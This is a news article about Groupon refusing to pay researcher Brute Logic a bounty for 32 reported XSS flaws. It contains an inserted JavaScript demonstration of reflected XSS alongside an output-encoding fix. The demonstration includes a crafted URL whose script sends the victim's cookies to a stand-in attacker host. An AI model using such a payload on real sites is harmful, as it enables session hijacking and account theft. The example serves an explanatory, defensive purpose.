Bounty programs benefit everyone. Companies like Microsoft get help from security experts, customers gain improved security, and those who discover and report vulnerabilities reap the rewards financially. Or at least that's how things are supposed to work.
Having reported a series of security problems to discount and deal site Groupon, security researcher Brute Logic from XSSposed.org was expecting a pay-out -- but the site refuses to stump up the cash. In all, Brute Logic reported more than 30 security issues with Groupon's site, but the company cites its Responsible Disclosure policy as the reason for not handing over the cash.
The story starts a few days ago when Brute Logic discovered 32 XSS (cross-site scripting) issues affecting Groupon. He says they were particularly serious as they existed at the root of the site and could be easily exploited with a malicious URL. Brute Logic says that the security issue is all the more serious because Groupon stores credit card details, and it would be incredibly easy to craft a spoof Groupon-related URL to trick victims into visiting a fake site.
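To make concrete what "easily exploited with a malicious URL" means for a reflected XSS flaw, here is an added example (not Groupon's code, and not anything Brute Logic published): a search page that echoes the `q` query parameter into its HTML, shown in its vulnerable form and with contextual output encoding applied. The hostnames, the crafted URL and the cookie-stealing payload are constructed for illustration.

```javascript
// Added example, not code from the original article or from Groupon.
// A hypothetical "search" page reflects the q parameter of the request URL.
// The URL, hostnames and payload below are constructed for this demonstration.

// A victim who clicks this link is sent to the real site, which then runs the
// attacker's script in the site's origin (here: sending cookies elsewhere).
const CRAFTED_URL =
  "https://example.com/search?q=%3Cscript%3Edocument.location%3D%27https%3A%2F%2F" +
  "attacker.example%2F%3Fc%3D%27%2Bdocument.cookie%3C%2Fscript%3E";

// Vulnerable handler: user-controlled input is placed into HTML unencoded.
function renderVulnerable(urlString) {
  const q = new URL(urlString).searchParams.get("q") ?? "";
  return `<h1>Results for: ${q}</h1>`;
}

// Output encoding for the HTML text context (also safe for quoted attributes).
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened handler: identical page, input encoded before it reaches the markup.
function renderSafe(urlString) {
  const q = new URL(urlString).searchParams.get("q") ?? "";
  return `<h1>Results for: ${escapeHtml(q)}</h1>`;
}

// Simple check used in the demonstration: did a <script> element appear in
// a response that the page itself never emits one in?
function injectsScript(html) {
  return /<script[\s>]/i.test(html);
}

console.log("vulnerable:", renderVulnerable(CRAFTED_URL));
console.log("hardened:  ", renderSafe(CRAFTED_URL));
```

The vulnerable response contains a live `<script>` element built from the URL; the hardened one renders the same payload as inert text (`&lt;script&gt;...`). Encoding must match the context the data lands in (HTML text, attribute, URL, JavaScript string); a single HTML escape is not sufficient if the value is later written into a script block or an event handler attribute.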
On 17 April he contacted Groupon to report the problems and heard back almost immediately with a note saying that the company would investigate and report back shortly. The security team then got back saying that it had managed to isolate the issue and would be in touch again once a patch had been produced.
Brute Logic enquired about the level of financial reward that might be offered, and Groupon responded by saying that the bounty was calculated on a case by case basis, promising to "circle back" with details of what could be offered in this instance.
As a contributor to XSSposed.org, Brute Logic spoke with people at the site and a reference to one of the security issues ended up being published. This only appeared online for a few moments, and was removed once it was realised it had been published in error. But Groupon is using this as a reason for refusing to pay out.
Groupon's Bug Bounty Program terms say:
Brute Logic argues that an additional 30 problems still existed and that very scant details of the security flaw were published for only a very short time. In a further email, Groupon said:
Understandably Brute Logic is not happy, as his tweets make clear:
32 @Groupon sites affected. They patched them. They refused to pay me. #Bullshit #PleaseRT pic.twitter.com/4j3w2FGFt4 (April 22, 2015)
He also points out that another company, Sucuri Security, was happy to pay out even after a tweet revealed some details of a security flaw in their product.
Does Groupon's decision seem fair to you, or does it smack of wriggling out of making a payment on a technicality?